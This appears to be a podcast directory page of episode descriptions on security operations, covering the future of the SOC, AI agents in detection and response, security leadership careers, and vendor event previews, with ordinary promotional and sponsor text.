POPULARITY
161 episodes with security operations
46 episodes with security operations
51 episodes with security operations
30 episodes with security operations
16 episodes with security operations
13 episodes with security operations
13 episodes with security operations
11 episodes with security operations
6 episodes with security operations
9 episodes with security operations
10 episodes with security operations
8 episodes with security operations
7 episodes with security operations
12 episodes with security operations
4 episodes with security operations
4 episodes with security operations
7 episodes with security operations
7 episodes with security operations
4 episodes with security operations
3 episodes with security operations
6 episodes with security operations
6 episodes with security operations
3 episodes with security operations
3 episodes with security operations
4 episodes with security operations
2 episodes with security operations
3 episodes with security operations
"The next five years are gonna be wild." That's the verdict from Forrester Principal Analyst Allie Mellen on the state of Security Operations. This episode dives into the "massive reset" that is transforming the SOC, driven by the rise of generative AI and a revolution in data management.Allie explains why the traditional L1, L2, L3 SOC model, long considered a "rite of passage" that leads to burnout is being replaced by a more agile and effective Detection Engineering structure. As a self-proclaimed "AI skeptic," she cuts through the marketing hype to reveal what's real and what's not, arguing that while we are "not really at the point of agentic" AI, the real value lies in specialized triage and investigation agents.Guest Socials - Allie's Linkedin Podcast Twitter - @CloudSecPod If you want to watch videos of this LIVE STREAMED episode and past episodes - Check out our other Cloud Security Social Channels:-Cloud Security Podcast- Youtube- Cloud Security Newsletter - Cloud Security BootCampIf you are interested in AI Cybersecurity, you can check out our sister podcast - AI Security PodcastQuestions asked:(00:00) Introduction(02:35) Who is Allie Mellen?(03:15) What is Security Operations in 2025? The SIEM & XDR Shakeup(06:20) The Rise of Security Data Lakes & Data Pipeline Tools(09:20) A "Great Reset" is Coming for the SOC(10:30) Why the L1/L2/L3 Model is a Burnout Machine(13:25) The Future is Detection Engineering: An "Infinite Loop of Improvement"(17:10) Using AI Hallucinations as a Feature for New Detections(18:30) AI in the SOC: Separating Hype from Reality(22:30) What is "Agentic AI" (and Are We There Yet?)(26:20) "No One Knows How to Secure AI": The Detection & Response Challenge(28:10) The Critical Role of Observability Data for AI Security(31:30) Are SOC Teams Actually Using AI Today?(34:30) How to Build a SOC Team in the AI Era: Uplift & Upskill(39:20) The 3 Things to Look for When Buying Security AI Tools(41:40) Final Questions: Reading, Cooking, and SushiResources:You can read Allie's blogs here
Josh Liburdi, Principal Engineer of Security Operations at DoorDash, joins Maxime Lamothe-Brassard, LimaCharlie CEO / Founder, to talk about building the Strelka file scanning system.As a security engineer who works in security operations (prevention, detection, and response), Josh has more than a decade of industry experience and has worked at several diverse organizations, including Brex, Target, and CrowdStrike.He also presents at information security conferences (BSides NYC & SF, SANS, fwd:cloudsec), is a published author (Bluenomicon from Splunk, Huntpedia from Sqrrl), and is active in the open source security community with contributions to many projects, including Substation at Brex (creator), Strelka at Target (creator), and the Zeek network analysis framework.Join Defender Fridays, live every Friday, to discuss the dynamic world of information security in a collaborative space with seasoned professionals. Become part of the LimaCharlie Community. Learn more about LimaCharlie at limacharlie.io.
Most security professionals know what a CISO does. But what about a BISO? And why are Fortune 500 companies increasingly creating this executive role?In this episode of The New CISO Podcast, host Steve Moore sits down with Evan Ferree, Staff Vice President and Business Information Security Officer at a Fortune 50 company, to decode one of cybersecurity's most misunderstood leadership positions.What You'll Learn:Understanding the BISO Role:What a Business Information Security Officer actually does (and how it differs from a Deputy CISO)When organizations need a BISO - the size, industry, and complexity indicatorsWhy the BISO serves as a "force multiplier" for the security organizationHow to measure and defend BISO value during organizational changeThe Career Journey:Evan's unconventional path from IT infrastructure to executive security leadershipHow a major cybersecurity breach became his "MBA in cybersecurity" in six monthsWhy volunteering for uncomfortable work during crisis creates career opportunitiesThe progression from vulnerability analyst to SOC leadership to Staff VPThe 90% Influence Principle:Why the BISO role is about influence, not authorityHow to navigate multiple business units with different security needsMastering the "why" behind security initiatives for non-technical audiencesBuilding relationships and organizational awareness over timeExecutive Skills That Matter:The "log lines" storytelling framework from Deloitte CISO AcademyDeveloping executive presence through failure and self-awarenessWhen to end a meeting and start over (and why that's okay)Speaking plain English vs. technical jargon with business leadersPractical Career Advice:Transitioning from tactical security operations to strategic leadership rolesWhy getting uncomfortable is essential for growthBuilding business acumen alongside technical expertiseWhy Evan's best security hires came from outside cybersecurityKey Insight: "You are 90% an influencer in this role. Unlike tactical security work where authority and urgency create credibility, the BISO must master explaining why security matters to the business - in terms the business understands."Whether you're a security professional planning your path to executive leadership, a CISO considering adding a BISO function, or a business leader trying to understand how security enables business outcomes, this episode delivers actionable insights from someone who's lived the journey.Guest: Evan Ferree, Staff Vice President & Business Information Security Officer at a Fortune 50 company, with 11 years of progressive security leadership experience spanning Security Operations, threat management, vulnerability management, and business information security.Hosted by: Steve Moore | Produced in partnership with: Exabeam
Podcast: PrOTect It All (LS 26 · TOP 10% what is this?)Episode: Bridging Military and Civilian Cybersecurity: Leadership, Skills, and Lifelong Learning with Christopher RossPub date: 2025-09-15Get Podcast Transcript →powered by Listen411 - fast audio-to-text and summarizationIn this episode, host Aaron Crow sits down with cybersecurity leader and National Guard threat hunt team lead Christopher Ross, diving into the real-world experiences that shape careers in the intersecting worlds of IT and OT security. Chris shares his 18-year journey from joining the military with a passion for computers to leading critical infrastructure cybersecurity efforts - both in uniform and in the private sector. Together, Aaron and Chris break down myths about gatekeeping, discuss the unique challenges of military versus civilian roles, and highlight lessons learned along the way. From imposter syndrome to servant leadership, the conversation unpacks how effective communication, continuous training, and the willingness to learn from failure fuel professional growth. Chris also reflects on how military training instills risk mitigation and teamwork, and how those skills can translate - and sometimes clash - with civilian cybersecurity cultures. They talk certifications, hands-on learning, the importance of meaningful tabletop exercises, and the evolving landscape as AI powers both attackers and defenders. Whether you're a veteran, a fresh analyst, or just passionate about cybersecurity, this honest and energetic exchange will leave you motivated to keep learning, keep growing, and keep protecting it all. So grab your energy drink and tune in for a conversation that proves everyone in cyber, no matter their path, has wisdom worth sharing. Key Moments: 05:30 Military Adventures Surpass Civilian Opportunities 07:28 Military vs. Civilian Leadership Dynamics 10:42 Clarifying Civilian vs Military Missions 12:22 Leadership: Addressing Miscommunication & Misalignment 15:45 Toxic Leadership and Military Transition 20:01 Reliance on Tools vs. Core Skills 22:29 "Forgotten Skills Fade Over Time" 25:13 Boosting Confidence in New Roles 29:42 Interactive Training and Environmental Protection 32:37 Purple Teaming Strategy Insights 36:15 Persistence in Skill Development 39:04 Soft Skills Matter for Career Growth 42:44 "Technical & Business Acumen Fusion" 44:41 Military: Career Value and Benefits 48:09 "Cyber Education for K-12" Resources Mentioned : https://www.ransomware.live/ comprehensive resource that tracks and monitors ransomware groups and their activities. https://ransomwhe.re/ tracks ransomware payments by collecting and analyzing cryptocurrency addresses associated with ransomware attacks. https://www.ransom-db.com/ real-time ransomware tracking platform that collects, indexes, and centralizes information on ransomware groups and their victims. About the Guest : Christopher Ross is a veteran and cybersecurity leader with over 15 years of experience in Security Operations, Incident Response, and threat hunting across defense and fintech. A Chief Warrant Officer in the Army National Guard's Cyber Brigade, he has led blue and purple team operations, translating military discipline and teamwork into enterprise cyber defense strategies. In his civilian career, Christopher has built and led SOC teams, integrated MSSPs, and driven automation to strengthen detection and response capabilities at organizations including MACOM, CFGI, Draper, and Abiomed. He holds a Master of Science in Information Security Engineering from the SANS Technology Institute and more than a dozen GIAC certifications. An Order of Thor recipient from the Military Cyber Professional Association. Christopher is passionate about developing playbooks, advancing training pipelines, and mentoring the next generation of defenders. Sharing lessons from his veteran-to-cyber journey, practical insights on certification paths and ROI, and real-world stories from blue-team operations and purple-team collaboration. Visit https://public.milcyber.org/ The Military Cyber Professionals Association is the only U.S. military professional association with cyber at its core. It connects, supports, and elevates those who serve in or support the military cyber domain, while investing in future generations through education and mentorship. Connect Christopher : https://www.linkedin.com/in/christopheraross-ma/ Connect With Aaron Crow: Website: www.corvosec.com LinkedIn: https://www.linkedin.com/in/aaronccrow Learn more about PrOTect IT All: Email: info@protectitall.co Website: https://protectitall.co/ X: https://twitter.com/protectitall YouTube: https://www.youtube.com/@PrOTectITAll FaceBook: https://facebook.com/protectitallpodcast To be a guest or suggest a guest/episode, please email us at info@protectitall.co Please leave us a review on Apple/Spotify Podcasts: Apple - https://podcasts.apple.com/us/podcast/protect-it-all/id1727211124 Spotify - https://open.spotify.com/show/1Vvi0euj3rE8xObK0yvYi4The podcast and artwork embedded on this page are from Aaron Crow, which is the property of its owner and not affiliated with or endorsed by Listen Notes, Inc.
I know that we're constantly talking about artificial intelligence - the best ways to use it, the ways hackers are using it, and the overall good, bad and ugly of implementing AI into your security infrastructure.But what if we took a little different route.In this episode we're going to explore how AI can help make your people better at managing cybersecurity. We know there's a huge talent pool shortage, and the challenges of keeping employees vigilant against repeated attacks continues to grow.So, watch/listen as I explore these dynamics, well as many others, with Grant Oviatt - Head of Security Operations for Prophet Security – a company that recently unveiled their State of AI in SecOps 2025 research report. A lot of the data from the report was rather shocking, especially when the survey repeatedly uncovered how many SOCs, inundated with constant intrusion alerts, have experienced numerous breaches simply because the volume of critical alert notifications has made them easier to ignore.It was a great conversation, with numerous takeaways, including:Why 60 percent of security teams have experienced critical breaches stemming from overlooked alerts.How security leaders anticipate AI solutions handling more tasks within the SOC over the next 3 years.Reasons for 57 percent of organizations deliberately suppressing detection rules and accepting higher risks to keep operations moving.How hackers are using AI beyond just phishing campaigns to get access to critical assets and networks.How the industrial sector can better implement AI without yielding to internal pressures.As a go-to podcast for our listeners, we want to help you align your brand with our expertise. By sponsoring our podcast, your brand will build trust, and your message will stand out to an audience searching for tools to assist their cybersecurity efforts. Click Here to Become a Sponsor.To catch up on past episodes, you can go to Manufacturing.net, IEN.com or MBTmag.com. You can also check Security Breach out wherever you get your podcasts, including Apple, Amazon and Overcast. If you have a cybersecurity story or topic that you'd like to have us explore on Security Breach, you can reach me at jeff@ien.com.
Credit unions have never seen a greater amount of fraud and other cybersecurity threats than they have in 2025.For this month's episode of the podcast, we're joined by Efrain Orsini, Jr., Director of Security Operations for SilverSky, a cybersecurity firm that has safeguarded a number of American credit unions for more than 20 years. “EJ”, as he likes to be called, talks about several of those emerging threats and how artificial intelligence is putting a new spin on many of them. He also discusses the ways credit unions, both large and small, can protect themselves moving forward.
In this episode of Lock It Down with Security Magazine, Simon Morgan, Chief Product Officer at SureView Systems, discusses the evolution of security operations and the rise of artificial intelligence in modern SOCs.
Guest: Augusto Barros, Principal Product Manager, Prophet Security, ex-Gartner analyst Topics: What is your definition of “AI SOC”? What will AI change in a SOC? What will the post-AI SOC look like? What are the primary mechanisms by which AI SOC tools reduce attacker dwell time, and what challenges do they face in maintaining signal fidelity? Why would this wave of SOC automation (namely, AI SOC) work now, if it did not fully succeed before (SOAR)? How do we measure progress towards AI SOC? What gets better at what time? How would we know? What SOC metrics will show improvement? What common misconceptions or challenges have organizations encountered during the initial stages of AI SOC adoption, and how can they be overcome? Do you have a timeline for SOC AI adoption? Sure, everybody wants AI alerts triage? What's next? What's after that? Resources: “State of AI in Security Operations 2025” report LinkedIn SOAR vs AI SOC argument post Are AI SOC Solutions the Real Deal or Just Hype? EP236 Accelerated SIEM Journey: A SOC Leader's Playbook for Modernization and AI EP238 Google Lessons for Using AI Agents for Securing Our Enterprise EP223 AI Addressable, Not AI Solvable: Reflections from RSA 2025 RSA 2025: AI's Promise vs. Security's Past — A Reality Check “Noise: A flaw in human judgement” book “Security Chaos Engineering” book (and Kelly episode) A Brief Guide for Dealing with ‘Humanless SOC' Idiots
How do you build and defend a network where attacks are not just expected-they're part of the curriculum? In this episode, Hazel talks with Jessica Oppenheimer, Director of Security Operations at Cisco, about the ten years she's spent in the Black Hat Network Operations Center (NOC).Explore the technical challenges of segmenting and monitoring a network designed for experimentation, live hacking, and hands-on training, including how malicious and benign behaviors are distinguished in real time. Jessica shares how the NOC leverages Cisco technologies like the new machine learning-powered SnortML engine to detect zero-days, outliers, and advanced attack patterns that traditional rule sets miss.Learn how automation, contextual analysis, and collaborative response drive decision-making in this high-stakes environment, and how those lessons now influence security at global events like the Olympics and the Super Bowl.For more details, check out the Cisco blog wrap detailing all our Black Hat NOC activity https://blogs.cisco.com/security/bhusa-2025-noc
Cybersecurity risks have become more complex and unpredictable than ever, yet many companies struggle to quantify these threats in terms that truly matter. How can CFOs and CISOs effectively communicate about risk, make smart security investments, and navigate the emerging challenges posed by AI? In this episode, CJ interviews Andy Ellis, a renowned cybersecurity leader, former CISO of Akamai, investor, director, advisor, leadership coach, and author of the book 1% Leadership. Andy unpacks why most companies measure risk the wrong way and breaks down his "Pyramid of Pain” framework for categorizing it. He discusses the dynamics between CFOs and CISOs in purchasing security tools, demystifies security budgeting and vendor negotiations, dives into the evolving role of AI in security operations, and explains why the CISO and CIO roles are on a collision course. Andy also reveals insider stories from the frontlines of major breaches, shares a compelling risk analogy inspired by vampires and zombies, and clears up once and for all why the demise of the Death Star was not a failure of risk management.—LINKS:Andy Ellis on LinkedIn: https://www.linkedin.com/in/csoandyAndy Ellis on X: (@CSOAndy) https://x.com/csoandyWebsite: https://www.csoandy.com1% Leadership: https://www.amazon.com/1-Leadership-Master-Improvements-Leaders/dp/0306830817How to CISO: https://www.howtociso.comDuha One: CJ on X (@cjgustafson222): https://x.com/cjgustafson222Mostly metrics: —TIMESTAMPS:(00:00) Preview and Intro(02:49) Sponsor – Rillet | Pulley | Brex(07:23) Defining Risk: Technical & Human-Friendly Perspectives(09:20) Actuarial Risk Versus Human-Driven Risk(15:33) Why the Demise of the Death Star Wasn't a Failure of Risk Management(16:58) Sponsor – Aleph | RightRev | Navan(21:22) How the Death Star Metaphor Relates to Real-World Security Breaches(23:20) Why Risk Should Not Be Quantified in Dollar Terms(25:15) The Pyramid of Pain: Risk Severity and Surprise Levels(30:21) How CFOs and CISOs Should Partner on Security Purchases(34:03) Are Security Budgets Over or Under-Spent?(36:22) Balancing Budget for Security Tools and People(39:48) Tips for FP&As on Brokering the Security Budget With Your CISO(44:10) Factoring AI Uncertainty in a Three-Year Security Roadmap(46:38) AI Washing in Security Products and Realistic Impact(48:55) The Limitations of Security Operations(50:53) The Future of CIO and CISO Roles and Organizational Reporting(54:55) Why IT Shouldn't Report to the CFO(57:18) Israeli Unit 8200 and Cybersecurity Innovation(59:50) Startups Versus Public Companies: Differing Risk Models(1:02:52) Wrap—SPONSORS:Rillet is the AI-native ERP modern finance teams are switching to because it's faster, simpler, and 100% built for how teams operate today. See how fast your team can move. Book a demo at https://www.rillet.com/metrics.Pulley is the cap table management platform built for CFOs and finance leaders who need reliable, audit-ready data and intuitive workflows, without the hidden fees or unreliable support. Switch in as little as 5 days and get 25% off your first year: https://pulley.com/mostlymetrics.Brex offers the world's smartest corporate card on a full-stack global platform that is everything CFOs need to manage their finances on an elite level. Plus, they offer modern banking and treasury as well as intuitive expenses and accounting automation, bill pay, and travel. Find out more at https://www.brex.com/metricsAleph automates 90% of manual, error-prone busywork, so you can focus on the strategic work you were hired to do. Minimize busywork and maximize impact with the power of a web app, the flexibility of spreadsheets, and the magic of AI. Get a personalised demo at https://www.getaleph.com/runRightRev automates the revenue recognition process from end to end, gives you real-time insights, and ensures ASC 606 / IFRS 15 compliance—all while closing books faster. For RevRec that auditors actually trust, visit https://www.rightrev.com and schedule a demo.Navan is the all-in-one travel and expense solution that can give you access to exclusive, proprietary Nasdaq-validated data that reveals what's happening with corporate travel investments. See the Navan Business Travel Index at https://navan.com/bti.#Cybersecurity #RiskManagement #CISO #SecurityOperations #SecurityFinance This is a public episode. If you would like to discuss this with other subscribers or get access to bonus episodes, visit www.mostlymetrics.com
Matt Muller, Field CISO at Tines, knows all about revolutionizing security operations through strategic AI integration and intelligent automation. In his conversation with Jack, Matt explores how traditional SOC models create problematic feedback loops where junior analysts make critical decisions while senior practitioners handle escalations, limiting learning and growth opportunities. Instead, Matt envisions AI-assisted workflows where senior expertise gets encoded into intelligent systems that teach junior team members while they work, transforming security operations from reactive alert-chasing to proactive strategic defense. He also emphasizes communication skills, relationship building, and moving beyond being perceived as the team of no to become strategic enablers. Topics discussed: Evolution from banning ChatGPT to strategic AI integration in security operations, emphasizing augmentation over replacement strategies. Model Context Protocol implementation challenges and the importance of safe-by-default approaches when integrating emerging AI technologies into production. Traditional SOC tier models create problematic feedback loops where junior analysts make critical decisions but lack learning opportunities. AI-assisted workflows can transform security operations by encoding senior expertise into systems that teach while automating routine tasks. Practical approaches to AI adoption including demystification techniques, validation methods, and breaking complex problems into manageable components. Strategic implementation of AI agents in security workflows, particularly for non-deterministic tasks like phishing investigation and alert triage. Importance of maintaining human oversight and guardrails when deploying AI systems in critical security operations and incident response. Communication skills and relationship building as fundamental competencies for security practitioners working with both AI systems and human stakeholders. Safe experimentation with AI technologies through controlled environments and understanding system limitations before production deployment. Listen to more episodes: Apple Spotify YouTube Website
Agentic AI is moving from hype to reality, reshaping how enterprises operate, and how cyber defenders must adapt. In this CyberTalks episode, Mark Gillett (Chief Product Officer, eSentire) is joined by Ben Wilde (Head of Innovation, Georgian) to break down the risks, reliability challenges, and opportunities presented by autonomous AI agents.In this episode, we explore:How AI agents expand the enterprise attack surfaceWhy “agent security” may soon be its own disciplineGuardrails security leaders need before adoptionThe balance between automation and human oversight in the SOCA practical crawl–walk–run model for implementing agentic AIIf you're a CISO, SOC architect, or IT leader, this episode will help you cut through the hype and prepare your team for the next frontier of AI-driven cybersecurity.--Have a question for us? Reach out: hello@esentire.com---About Cyber TalksFrom ransomware attacks to supply chain compromises, eSentire's Cyber Talks podcast will delve into the world of the latest cyber threats that are impacting businesses globally. Join our team of security experts as we speak with C-level executives and security practitioners about the cyber risks affecting their business and how they're addressing these challenges.About eSentireeSentire, Inc., the Authority in Managed Detection and Response (MDR), protects the critical data and applications of 2000+ organizations in 80+ countries, across 35 industries from known and unknown cyber threats by providing Exposure Management, Managed Detection and Response and Incident Response services designed to build an organization's cyber resilience & prevent business disruption. Founded in 2001, eSentire protects the world's most targeted organizations with 65% of its global base recognized as critical infrastructure, vital to economic health and stability. By combining open XDR platform technology, 24/7 threat hunting, and proven security operations leadership, eSentire's award-winning MDR services and team of experts help organizations anticipate, withstand and recover from cyberattacks. For more information, visit www.esentire.com and follow @eSentire.
What if you're writing a book series about espionage, dangerous governments and you have worked at the forefront defending your country from all of these threats. Steinke has spent a lifetime in US national security roles, including twenty-eight years in the US Army and fourteen in the Department of Defence. His official duties have taken him from the US Military Academy at West Point to over thirty countries on the Eurasian landmass, including Afghanistan and Ukraine. Steinke holds master's degrees in West European studies and diplomacy from Indiana and Norwich Universities, respectively, as well as post-graduation certificates in national and international security affairs from Harvard and Stanford Universities. His passions include faith, family, fly fishing, and travel. Rick https://ricksteinke.com/
What does it take to run a world-class Security Operations Center (SOC) in today's high-stakes, high-speed cybersecurity landscape?In this episode of the @Endace, Packet Forensic Files, Michael Morris chats with Jessica (Bair) Oppenheimer, Cisco's Director of Security Operations, for an in-depth look at next-generation Security Operations Centers (SOCs). Jessica shares her expertise from securing high-stakes events like the Paris 2024 Olympics, NFL Super Bowl, Black Hat, and RSAC Conference. Discover how her team leverages AI, full packet capture with EndaceProbes, and integrations with Cisco XDR and Splunk to combat AI-driven threats and ensure rapid detection and response. This episode is a must-listen for cybersecurity professionals who want to stay ahead of evolving threats. It is packed with insights on balancing automation with human expertise and key KPIs for SOC success.ABOUT ENDACE *****************Endace (https://www.endace.com) is a world leader in high-performance packet capture solutions for cybersecurity, network and application performance. EndaceProbes are deployed on some of the world's largest, fastest and most critical networks. EndaceProbe models are available for on-premise, private cloud and public cloud deployments - delivering complete hybrid cloud visibility from a single pane-of-glass.Endace's open EndaceProbe Analytics appliances (https://www.endace.com/endaceprobe) can be deployed in on-premise locations and can also host third-party security and performance monitoring solutions while simultaneously recording a 100% accurate history of network activity.
Guest: Dominik Swierad, Senior PM D&R AI and Sec-Gemini Topics: When introducing AI agents to security teams at Google, what was your initial strategy to build trust and overcome the natural skepticism? Can you walk us through the very first conversations and the key concerns that were raised? With a vast array of applications, how did you identify and prioritize the initial use cases for AI agents within Google's enterprise security? What specific criteria made a use case a good candidate for early evaluation? Were there any surprising 'no-go' areas you discovered?" Beyond simple efficiency gains, what were the key metrics and qualitative feedback mechanisms you used to evaluate the success of the initial AI agent deployments? What were the most significant hurdles you faced in transitioning from successful pilots to broader adoption of AI agents? How do you manage the inherent risks of autonomous agents, such as potential for errors or adversarial manipulation, within a live and critical environment like Google's? How has the introduction of AI agents changed the day-to-day responsibilities and skill requirements for Google's security engineers? From your unique vantage point of deploying defensive AI agents, what are your biggest concerns about how threat actors will inevitably leverage similar technologies? Resources: EP235 The Autonomous Frontier: Governing AI Agents from Code to Courtroom EP236 Accelerated SIEM Journey: A SOC Leader's Playbook for Modernization and AI EP224 Protecting the Learning Machines: From AI Agents to Provenance in MLSecOps EP227 AI-Native MDR: Betting on the Future of Security Operations? EP75 How We Scale Detection and Response at Google: Automation, Metrics, Toil
Kevin Nikkhoo joins the show to explore Security Operations Center as a Service (SOCaaS) and how it compares to traditional SOC models. He breaks down which organizations benefit most from this approach and how AI is reshaping modern SOC operations. Listeners will gain a clear understanding of how SOCaaS can enhance detection and response capabilities—and why embracing AI is key to the future of security operations. Segment Resources: https://www.xenexsoc.com/ https://www.xenexsoc.com/blog https://www.xenexsoc.com/ebooks This segment is sponsored by Tines. Tines' AI-enabled, secure workflow platform empowers your whole team regardless of their coding abilities, environment complexities, or tech stack. Learn more at https://cisostoriespodcast.com/tines Visit https://cisostoriespodcast.com for all the latest episodes! Show Notes: https://cisostoriespodcast.com/csp-215
The nature of Security Operations is changing. As cloud environments grow in complexity and data volumes explode, traditional approaches to detection and response are proving insufficient. This episode features an in-depth conversation with Kyle Polley, who leads the AI security team at Perplexity, about a modern blueprint for the Security Operations Center (SOC).The discussion centers on a necessary architectural shift away from traditional SIEMs, which were not built for today's scale, toward a "data lake infrastructure built for detection and response". Kyle explains how this model provides the scalability needed to handle modern data loads and enables a more effective incident response process.A cornerstone of this new model is the use of centralized AI agents. The conversation explores how these agents can be tasked with performing in-depth alert investigations, helping to reduce analyst burnout and allowing security teams to focus on more proactive, high-impact work. This approach moves beyond simple automation to create a system where AI augments and enhances the capabilities of the human team.Guest Socials - Kyle's Linkedin Podcast Twitter - @CloudSecPod If you want to watch videos of this LIVE STREAMED episode and past episodes - Check out our other Cloud Security Social Channels:-Cloud Security Podcast- Youtube- Cloud Security Newsletter - Cloud Security BootCampIf you are interested in AI Cybersecurity, you can check out our sister podcast - AI Cybersecurity PodcastQuestions asked:(00:00) Introduction to Kyle Polley & The Future of SOCs(01:03) The Core Argument: Why You Must Build Your SOC Before Compliance(03:34) Beyond the Certificate: The Difference Between Being Compliant vs. Secure(04:20) Today's #1 AI Threat: The Challenge of Prompt Injection(06:00) The Architectural Flaw: Handling Untrusted Data in AI Systems(08:20) The "Security Data Lake": Moving Beyond the Traditional SIEM(15:00) The Future is Now: A Centralized AI Agent for Automated Investigations(20:06) Will AI Take My Job? How AI Elevates, Not Replaces, the Security Analyst(25:20) Redefining "Shifting Left" with Personal AI Security Agents(31:00) Can AI Reason? How Modern AI Agents Intelligently Query Logs(37:05) Rethinking Incident Response Playbooks in the Age of AI(41:00) The MVP SOC: A Practical Roadmap for Small & Medium Companies(46:08) Final Questions: Maintaining Optimism, Woodworking, and Tex-Mex(50:08) Where to Connect with Kyle PolleyResources spoken about during the episode:Easy Agents: an open-source frameworkHow to give every department their own AI Agent
What does the integration of AI into a Security Operations Center (SOC) practically look like? This episode explores the concept of the "Agentic SOC," moving beyond marketing terms to discuss its real-world applications and limitations.Ashish Rajan is joined by Edward Wu, CEO of Dropzone AI, for an in-depth discussion on the current state of artificial intelligence in cybersecurity. Edward, who holds numerous patents in the field, shares his perspective on how AI is changing security operations. The conversation details how AI agents can function as a tool to support human analysts rather than replace them, and why the idea of a fully autonomous SOC is not yet a reality.The "Agentic SOC" model: A framework where AI agents assist human security engineers.AI's role in alert investigation: How AI can autonomously investigate alerts by making over a hundred large language model invocations for a single alert.Practical limitations of AI: A discussion on challenges like AI hallucinations and the need for organizational context.Building vs. buying AI tools: An overview of the complexities involved in creating in-house AI agents for security.The impact on SOC metrics: How AI can influence Mean Time To Resolution (MTTR) by investigating alerts in parallel within minutes.The future for security professionals: How the role of a Level 1 SOC analyst is expected to evolve as AI handles more repetitive tasks.Guest Socials - Edward's Linkedin Podcast Twitter - @CloudSecPod If you want to watch videos of this LIVE STREAMED episode and past episodes - Check out our other Cloud Security Social Channels:-Cloud Security Podcast- Youtube- Cloud Security Newsletter - Cloud Security BootCampIf you are interested in AI Cybersecurity, you can check out our sister podcast - AI Cybersecurity PodcastQuestions asked:(00:00) Introduction: Why Agentic AI in the SOC Matters Now(03:03) Meet Edward Wu: 30 Patents and a Mission to Fix Alert Fatigue(04:03) What is an "Agentic SOC"? (AI Foot Soldiers & Human Generals)(06:27) Why SOAR & Playbooks Are Not Enough for Modern Threats(08:18) Reality vs. Hype: Can AI Create a Fully Autonomous SOC?(11:55) The New SOC Workflow: How AI Changes Daily Operations(14:10) Can You Build Your Own AI Agent? The Hidden Complexities(19:06) From Skepticism to Demand: The Evolution of AI in Security(22:00) Slashing MTTR: How AI Transforms Key SOC Metrics(28:42) Are AI-Powered Cyber Attacks Really on the Rise?(31:01) How Smart SOC Teams Use ChatGPT & Co-Pilots Today(32:38) The 4 Maturity Levels of Adopting AI in Your SOC(37:04) How to Build Trust in Your AI's Security Decisions(41:28) Beyond the SOC: Which Cybersecurity Jobs Will AI Disrupt Next?(46:44) What is the Future for Level 1 SOC Analysts?(49:11) Getting to Know Edward: Sim Racing & StarCraft ChampionResources spoken about during the episode:Take a self-guided demo of Dropzone.aiRequest a Demo Download a Copy of the Gartner Hype Cycle for Security Operations 2025 Thank you to our episode sponsor Dropzone.ai
ThreatLocker to Unveil Game-Changing Zero Trust Innovations at Black Hat 2025 | Visit Them at Booth #1933 | A ThreatLocker Pre-Event Coverage of Black Hat USA 2025 Las Vegas | Brand Story with John LillistonJoin ITSP Magazine's Marco Ciappelli and Sean Martin as they preview ThreatLocker's exciting Black Hat 2025 presence with Detect Product Director John Lilliston. Discover upcoming major announcements, hands-on hacking demos, and how ThreatLocker's default deny approach is revolutionizing enterprise cybersecurity through comprehensive zero trust implementation.As Black Hat USA 2025 approaches, cybersecurity professionals are gearing up for one of the industry's most anticipated events. ITSP Magazine's Marco Ciappelli and Sean Martin recently sat down with John Lilliston, ThreatLocker's Detect Product Director, to preview what promises to be an exciting showcase of zero trust innovation at booth 1933.ThreatLocker has become synonymous with the "default deny" security approach, a philosophy that fundamentally changes how organizations protect their digital assets. Unlike traditional security models that allow by default and block known threats, ThreatLocker's approach denies everything by default and allows only approved applications, network communications, and storage operations. This comprehensive strategy operates across application, network, and storage levels, creating what Lilliston describes as a "hardened system that stops adversaries in their tracks."The company's rapid growth reflects the industry's embrace of zero trust principles, moving beyond buzzword status to practical, enterprise-ready solutions. Lilliston, who joined ThreatLocker in February after evaluating their products from the enterprise side, emphasizes how the platform's learning mode and ring fencing capabilities set it apart from competitors in the application control space.At Black Hat 2025, ThreatLocker will demonstrate their defense-in-depth strategy through their Detect product line. While their primary zero trust controls rarely fail, Detect provides crucial monitoring for applications that must run in enterprise environments but may have elevated risk profiles. The system can automatically orchestrate responses to threats, such as locking down browsers exhibiting irregular behavior that might indicate data exfiltration attempts.Visitors to booth 1933 can expect hands-on demonstrations and on-demand hacking scenarios that showcase real-world applications of ThreatLocker's technology. The company is preparing major announcements that CEO Danny Houlihan will reveal during the event, promising game-changing developments for both the organization and its client base.ThreatLocker's Black Hat agenda includes a welcome reception on Tuesday, August 5th, from 7-10 PM at the Mandalay Bay Complex, and Houlihan's presentation on "Simplifying Cybersecurity" on Thursday, August 7th, from 10:15-11:05 AM at Mandalay Bay J.The convergence of practical zero trust implementation, cutting-edge threat detection, and automated response capabilities positions ThreatLocker as a key player in the evolving cybersecurity landscape, making their Black Hat presence essential viewing for security professionals seeking comprehensive protection strategies.Keywords: Black Hat 2025, zero trust security, cybersecurity conference, ThreatLocker, default deny strategy, endpoint protection, application control, threat detection, enterprise security, network security, cybersecurity solutions, security automation, malware prevention, cyber threats, information security, security platform, Black Hat USA, cybersecurity innovation, managed detection response, security operationsLearn more about ThreatLocker: https://itspm.ag/threatlocker-r974Note: This story contains promotional content.Learn more.Guests:John LillistonCybersecurity Director | Threat Detection & Response | SOC Leadership | DFIR | EDR/XDR Strategy | GCFA, GISP | https://www.linkedin.com/in/john-lilliston-4725217b/Hosts:Sean Martin, Co-Founder at ITSPmagazine | Website: https://www.seanmartin.comMarco Ciappelli, Co-Founder at ITSPmagazine | Website: https://www.marcociappelli.com______________________ResourcesLearn more and catch more stories from ThreatLocker: https://www.itspmagazine.com/directory/threatlockerThreatLocker® Welcome Reception | Don't gamble with your security! Join us at Black Hat for a lively Welcome Reception hosted by ThreatLocker®. Meet our Cyber Hero® Team and dive into discussions on the latest advancements in ThreatLocker®Endpoint Security. It's a great opportunity to connect and learn together! Time: 7PM - 10PM | Location: Mandalay Bay Complex RSVP below and we'll send you a confirmation email with all the details.[ Welcome Reception RSVP ]Learn more about ITSPmagazine Brand Story Podcasts: https://www.itspmagazine.com/purchase-programsNewsletter Archive: https://www.linkedin.com/newsletters/tune-into-the-latest-podcasts-7109347022809309184/Business Newsletter Signup: https://www.itspmagazine.com/itspmagazine-business-updates-sign-upAre you interested in telling your story?https://www.itspmagazine.com/telling-your-story
